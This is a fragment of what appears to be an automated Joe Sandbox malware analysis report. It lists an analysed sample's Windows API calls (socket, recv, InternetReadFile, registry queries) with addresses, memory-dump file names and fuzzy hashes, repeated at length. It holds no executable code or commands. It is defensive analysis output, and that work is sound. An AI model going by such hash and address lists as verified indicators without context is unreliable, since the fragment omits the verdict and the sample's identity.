                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                        • Opcode ID: 6688a45f4184328566aac6b4ed74be48bb7a3c21e4cc4a6ed1afa1550693238d
                                                                                                                                                                        • Instruction ID: c7c5c17831e90324ed4afa5d11201efbc2ca3822ba6762b099c39e5697bc238f
                                                                                                                                                                        • Opcode Fuzzy Hash: 6688a45f4184328566aac6b4ed74be48bb7a3c21e4cc4a6ed1afa1550693238d
                                                                                                                                                                        • Instruction Fuzzy Hash: 54E0CD75B012016BD700CF69DD90AEB7B3AEFC4200F1C8414E501E7254EA70A812C754
                                                                                                                                                                        APIs
                                                                                                                                                                        • recv.WS2_32(?,?,00001000,00000000), ref: 0041B424
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: recv
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1507349165-0
                                                                                                                                                                        • Opcode ID: caad673fedd87d4856dd1157f87e00702ba0b3420d41bb5e536a51b9e100c0fb
                                                                                                                                                                        • Instruction ID: aead8b8d50fb7840cfb2a962f70a832c4e1e8eaf575e56f7ff135d4e5528414a
                                                                                                                                                                        • Opcode Fuzzy Hash: caad673fedd87d4856dd1157f87e00702ba0b3420d41bb5e536a51b9e100c0fb
                                                                                                                                                                        • Instruction Fuzzy Hash: 0DE012713042049BE765DB1CCD55F5272D4A784344F040429F559CB382EBA4EC118759
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,?,?,?,?), ref: 004319AD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: 55fafbb745de52f37c2e54d196e5d7b3474cf04051da483c2763e667d4adef85
                                                                                                                                                                        • Instruction ID: 0f8d8d2c4aa481d8294781b734d66185b22faf5e27e84ddd18bef5484c15063d
                                                                                                                                                                        • Opcode Fuzzy Hash: 55fafbb745de52f37c2e54d196e5d7b3474cf04051da483c2763e667d4adef85
                                                                                                                                                                        • Instruction Fuzzy Hash: 61E0EC36644000AFCA219B5DEC48C9A7B75EBCAB09B448479F5C146230D6715925DB62
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 004156A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                        • Opcode ID: 643b88a5ea669c3f658c673bb12741f48ec1ce850c4aea71cb35032df8244005
                                                                                                                                                                        • Instruction ID: 9f5938fca2b3dfc9c7298c4946ac386d7705a1478a4a7384f001f340b41cb7d4
                                                                                                                                                                        • Opcode Fuzzy Hash: 643b88a5ea669c3f658c673bb12741f48ec1ce850c4aea71cb35032df8244005
                                                                                                                                                                        • Instruction Fuzzy Hash: E4E0EC31B0410ADFDB08DF14CDA9D9677BBFF887047204458E5099B169EAB0BE06CF95
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetReadFile.WININET(?,?,000000C7,?), ref: 00417721
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                        • Opcode ID: 30f4bd5ea8fd804b778e080960fc29e2a21135f07ef5fa9cad9cf84069eb747d
                                                                                                                                                                        • Instruction ID: 897980dddf20cb38dc0a6acb9985aec6eb2c8e98df4fb9227e8a1d99487b72db
                                                                                                                                                                        • Opcode Fuzzy Hash: 30f4bd5ea8fd804b778e080960fc29e2a21135f07ef5fa9cad9cf84069eb747d
                                                                                                                                                                        • Instruction Fuzzy Hash: C8E0B6B160061BDFDB08CF40CC95D6A336AFB94704B258569E5019B255F6A1A946CB80
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 004169CD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                        • Opcode ID: fdb34fb5765534ad1be066e353eac3e777020ca7a94341d98781c47ce708297b
                                                                                                                                                                        • Instruction ID: e67d891b9b41ce4889a9a502cda52c0fc0ea7c6753f145824986adfaef5e1314
                                                                                                                                                                        • Opcode Fuzzy Hash: fdb34fb5765534ad1be066e353eac3e777020ca7a94341d98781c47ce708297b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7FE08C7170420A9FDF08DB10DC89D867777FBC4705B204A5CE410AB250EA70A907CB40
                                                                                                                                                                        APIs
                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 0041AFF2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: socket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 98920635-0
                                                                                                                                                                        • Opcode ID: dead2f6ea5f43f602b10022a8e9819915a478e7393a3c685078b224727a79d14
                                                                                                                                                                        • Instruction ID: d49d51e8e7057c320cd1e83a91f227be925c56538ff9a38844aff0f3c62bd3e1
                                                                                                                                                                        • Opcode Fuzzy Hash: dead2f6ea5f43f602b10022a8e9819915a478e7393a3c685078b224727a79d14
                                                                                                                                                                        • Instruction Fuzzy Hash: C2D05B7034451057DA28D71CCD51B177253ABC0764F244A19F1255F3D2E7F55C514745
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,0066C297,00000000,00020119), ref: 00431268
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: bcc0e8d44c410ac47834b993ae4d33632993930fb0a1bb375e1f765b45e8fc7b
                                                                                                                                                                        • Instruction ID: 6d540d9a666b1ce77cc5993873b9170c6c0be28dcee01b855a3900b9505d3003
                                                                                                                                                                        • Opcode Fuzzy Hash: bcc0e8d44c410ac47834b993ae4d33632993930fb0a1bb375e1f765b45e8fc7b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BD0C274313A00DFEB148F19DC49F547771EB8C351F10005DF500571A1C7719810CA56
                                                                                                                                                                        APIs
                                                                                                                                                                        • recv.WS2_32(?,?,00001000,00000000), ref: 0041B7CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
